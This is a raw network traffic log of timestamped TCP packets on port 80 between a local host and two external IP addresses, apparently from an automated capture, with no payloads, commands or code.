Aug 31, 2024 15:44:19.788247108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788278103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788280010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788305044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788326025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788343906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788356066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788367033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788377047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788384914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788388014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788400888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788414001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788424969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788428068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788438082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788450956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788453102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788461924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788474083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788491011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788491964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.788500071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.788527966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790608883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790621996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790633917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790644884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790654898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790666103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790666103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790678978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790689945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790690899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790709972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790718079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790723085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790733099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790735006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790749073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790759087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790765047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790776968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790787935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790796041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790801048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790803909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790816069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790827036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790832043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790838957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790851116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790858030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790863037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790874004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790879965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790890932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790899038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790903091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.790921926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.790945053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791027069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791040897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791059017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791069031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791078091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791094065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791146040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791162968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791172981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791182995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791194916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791194916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791205883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791218042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791224957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791228056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791256905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791269064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791764975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791776896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791789055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791815042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791826963 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.791949987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.791997910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792095900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792108059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792119026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792167902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792197943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792205095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792222023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792232990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792243004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792254925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792258978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792282104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792294979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792330980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792342901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792355061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792393923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792407990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792679071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792690039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792701960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792743921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792768955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792777061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792788982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792799950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792809963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792821884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792824030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792838097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792848110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792856932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792856932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792871952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792871952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792895079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792907000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792917013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.792932987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.792957067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794126034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794137955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794148922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794193983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794205904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794226885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794239998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794250965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794265985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794276953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794303894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794883966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794895887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794909000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.794945955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794958115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.794990063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795001984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795013905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795025110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795030117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.795037985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795049906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.795083046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.795104980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795116901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795128107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795137882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795149088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795154095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.795161009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.795171976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.795197010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.854748011 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854758978 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854770899 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854794979 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854805946 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854816914 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854819059 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.854819059 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.854827881 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.854865074 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.854893923 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.855351925 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.855402946 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.855660915 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.855755091 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.876033068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876041889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876046896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876080036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876091957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876106024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876106977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.876106977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.876116991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.876143932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.876162052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.877151012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877162933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877175093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877197027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.877211094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.877279997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877316952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.877348900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877361059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877372026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.877397060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.877419949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.878988981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879000902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879013062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879040956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879086018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879089117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879101992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879112005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879117966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879129887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879142046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879149914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879178047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879216909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879228115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879239082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879251003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879267931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879268885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879281044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.879287958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879312992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.879337072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881185055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881196022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881206989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881238937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881246090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881258011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881268978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881273985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881280899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881297112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881316900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881339073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881484985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881509066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881520987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881531954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881539106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881544113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881556988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881562948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881575108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881589890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881589890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881602049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881616116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881618977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881623983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881627083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881628990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881630898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881644011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881649017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881660938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881673098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881683111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881683111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881695032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881700039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881711006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881726027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881727934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881732941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881757021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881777048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881779909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881850958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.881977081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.881989002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882035017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882035971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882046938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882065058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882076025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882081032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882102966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882129908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882666111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882677078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882695913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882707119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882714987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882719040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882730007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882750034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882751942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882766008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882770061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882771969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882783890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882814884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.882953882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882966042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.882994890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883019924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883045912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883049965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883057117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883064985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883100986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883124113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883409023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883423090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883433104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883452892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883457899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883466005 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883471012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883481979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883486032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883496046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883500099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883516073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883544922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883712053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883759975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883851051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883865118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883871078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883882046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883888006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883898973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.883908033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.883991003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.884682894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884695053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884706974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884736061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.884763002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.884829998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884841919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884851933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884864092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.884879112 CEST	49727	80	192.168.2.5	52.212.52.84
